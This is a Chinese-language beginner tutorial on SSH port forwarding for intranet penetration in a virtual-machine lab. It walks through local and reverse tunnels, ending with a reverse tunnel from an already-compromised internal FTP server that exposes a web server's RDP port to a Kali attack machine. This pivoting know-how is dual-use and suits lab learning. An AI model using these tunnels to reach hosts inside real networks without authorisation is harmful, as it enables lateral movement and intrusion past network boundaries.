内网穿透渗透小白初级基础（一）

通常来说，外网是无法直接访问到内网的，这是因为在外网，电脑之间是通过公网ip 来发现彼此的位置， 而ip 地址是有限的，所以有了NAT 的诞生，它可以让一个公网ip 分成无数个内网ip ，这也是为了解决目前 ip 地址不够用的尴尬局面，我们现在大多数人，无论是通过WiFi 上网还是网线上网，所用的网络都是局域网，所用的ip 都是内网ip。现在，公网ip 所在的网络是外网，内网ip 所在的网络是局域网，一般外网是访问不到内网的，而内网穿透就是为此而诞生，它可以让你身在局域网中的电脑实现外网访问的功能。

SSH：一个强大的内网穿透工具

相信很多人都用过ssh 来解决自己的问题，但却没有去仔细的了解这个工具，所以忽略了它很多强大的地方，比如用于最基础的内网穿透，它绝对是符合刚学习内网穿透的小白的。

在进入主题前，我们先通过几个例子来了解一下ssh 的各项参数都有哪些作用

一、ssh 的正向转发功能

所谓“正向转发”就是在本地启动监听端口，把访问本地监听端口数据转发到远端。

首先，我们先搭建下图的实验环境

现在我们来尝试将服务器B 的6000 端口映射到服务器C 的80 端口

在服务器B 中执行如下命令：ssh -NL 0.0.0.0:6000:192.168.2.70:80 root@192.168.2.70

其中的参数意义如下：

-N：不执行远程指令；

-L：使用本地端口转发，将本地机(客户机)的某个端口转发到远端指定机器的指定端口；

此时我们再用kali 去访问 服务器B 的6000 端口就会发现其访问的是服务器C 的80 端口，总所周知，80端口其实是与http 协议挂钩，我们不妨在服务器C 的/var/www/html 目录下放置一个helloworld文件来验证一下

二、本地端口通过跳板映射到其它机器

服务器A上执行如下命令：

ssh -NL 0.0.0.0:6000:192.168.2.70:80 root@192.168.2.60

这样就将会将访问服务器A 6000 端口的流量转发给服务器B ，再由B 去访问服务器C 的80 端口。这时访问服务器A 的6000 端口就可以访问服务器C 上的网站了

三、现在我们正式进入今天的主题，内网穿透！！！

首先搭建一个下图这样的环境，将公网中的主机的网关 关掉，这样公网就ping 不通内网，使得环境更加真实，也更能体现出这个实验的作用。

VM8 中的主机是NAT 模式，VM1 中的主机是仅主机模式。

NAT 是模拟的路由器，它拥有两张网卡，一张是在公网网段，一张是在内网网段，作为内网的网关，也是内外网沟通的桥梁，这个nat 可以使用一台windows 虚拟机去搭建环境，主要是作为一个流量中转站

那么我们就成功在本机电脑模拟出了两台在公网的电脑和两台在内网的电脑

接下来我们先看看公网的电脑要如何访问到内网的电脑

考虑到小白，我们先从内网穿透的实现形式开始

首先，先假设我们已经获得内网中FTP 服务器的管理员权限，现在我们要怎么去攻破内网中的web 服务器呢？

这就要用到我们刚才所用到的ssh工具了

ssh 还有一个参数叫 -R ，它是使用转成端口转发，将远程主机(服务器)的某个端口转发到本地端指定机器的指定端口。

举个例子，在我们搭建的环境中，FTP 服务器是我们打入敌军内部的二五仔，现在我们可以控制它去访问内网的所有服务器。

如果我们直接 ssh root@10.10.10.15 是连不到二五仔的，现在只有它能主动联系我们，而我们是联系不到它的尴尬局面，不过我们可以通过“暗号”来控制它。

我们在FTP 服务器输入 ssh -NR 10022:localhost:22 192.168.2.60

这样我们就知道二五仔让我们在跳板机的10022 端口去联系他

所以我们在跳板机中输入ssh root@localhost -p 10022

之后就会发现我们的身份已经成功变成替代了二五仔

现在，我们要进一步的攻击内网的web服务器

可能有些人不知道，window 有个远程桌面连接，它类似于Linux 的ssh 连接，但与ssh 不同的是，它连接成功后不是出现命令行，而是window 的GUI桌面

这个远程桌面连接只有在同一网段的主机可以相连（本人比较菜，只知道这种连接，不知道还有没有其它的方法），比如跟web 服务器在同一个网段中的FTP 服务器，它就可以远程桌面登录web 服务器，程序占用的端口为3389，而FTP 服务器这个二五仔现在已经被我们操控了，所以只要再运行远程连接的命令即可

在kali 中有一个工具叫 rdesktop 就有远程连接的功能，我们可以在kali 的图形操作系统上利用这个工具作为攻下web服务器的最后杀手锏。

现在，我们利用刚才学到的知识来拿下内网渗透的第一台主机 web 服务器！

在二五仔上输入 ssh -NR 0.0.0.0:10022:10.10.10.13:3389 root@192.168.2.60

将web 服务器的3389 端口映射到跳板机的10022 端口上

然后攻击机就可以通过跳板机的10022 端口远程连接web 服务器，获得web 服务器的window桌面进行操作

这样，我们就成功拿下了人生第一台内网服务器了

下面是ssh 一些 与内网穿透有关的参数

SSH隧道代理命令参数

-p：指定远程主机的端口；

-C：允许压缩数据，这在主要代理基于文本的信息（如网页浏览）时加快隧道速度，但在代理二进制信息（如下载文件）时会减慢速度；

-N：不执行远程指令；

-L：使用本地端口转发，将本地机(客户机)的某个端口转发到远端指定机器的指定端口；

-f：后台执行ssh命令；

-D：指定动态端口转发（SOCKS 代理），1080是标准的SOCKS 端口。尽管可以使用任何端口号，但某些程序只有在使用1080 时才能运行。